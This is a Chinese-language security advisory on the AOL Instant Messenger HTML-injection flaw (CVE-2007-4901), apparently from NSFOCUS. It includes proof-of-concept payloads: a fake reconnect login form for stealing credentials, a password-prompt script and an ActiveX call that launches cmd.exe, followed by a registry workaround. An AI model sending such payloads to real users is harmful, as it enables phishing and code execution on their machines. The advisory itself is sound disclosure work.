AOL Instant Messenger通知窗口远程脚本执行漏洞
发布日期:2007-09-13
更新日期:2007-09-24
受影响系统:AOL Instant Messenger Pro
AOL Instant Messenger Lite
AOL Instant Messenger 6.2 (6.2.32.1)
AOL Instant Messenger 6.1 (6.1.41.2)
描述:
BUGTRAQ ID:
25659
CVE(CAN) ID:
CVE-2007-4901
AOL Instant Messenger是一款在线即时聊天工具。
AIM在处理消息窗口时存在漏洞,可能导致信息泄露及代码执行。
为了支持渲染HTML内容,AOL Instant Messaging软件客户端使用了嵌入的Internet Explorer服务器协议,但没有正确的过滤恶意输入内容,因此攻击者可以在IM消息中提供恶意的HTML内容来利用Internet Explorer的bug或安全配置弱点,导致注入并执行任意代码或伪造跨站请求。
<*来源:Lone (
Lone@Lone-Matrix.com)
Shell (
shell6@gmail.com)
链接:
http://marc.info/?l=bugtraq&m=118961836001612&w=2
http://marc.info/?l=bugtraq&m=118979072319645&w=2
http://marc.info/?l=bugtraq&m=119074291714119&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<hr><h2>SERVICE UNAVAILABLE</h2><hr>Your connection to AIM has been interrupted. Please type in your credentials in order to reconnect. Thank you.<br><form method=GET action=
http://localhost>Login: <input type=text name=login><br>Password: <input type=text name=password><br><input type=submit value=Reconnect></form><br><hr>
<img src=”javascript:alert(‘I have executed javascript in your computer’)”>
<img src='javascript:var passwd=window.prompt("You have been disconnected from the network.\nPlease re-enter your password to reconnect.", "");alert(“You have disclosed your password:”+passwd);'>
<img src="javascript:var oShell = new ActiveXObject('Shell.Application');oShell.ShellExecute('cmd.exe', '/c pause');">
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 找到以下注册表项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Internet
Explorer\Main\FeatureControl\FEATURE_LocalMachine_Lockdown
添加REG_DWORD值命名为AIM客户端应用程序(如aim.exe)并设置为1。
厂商补丁:
AOL
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.aol.com/aim/home.html浏览次数:2857
严重程度:0(网友投票)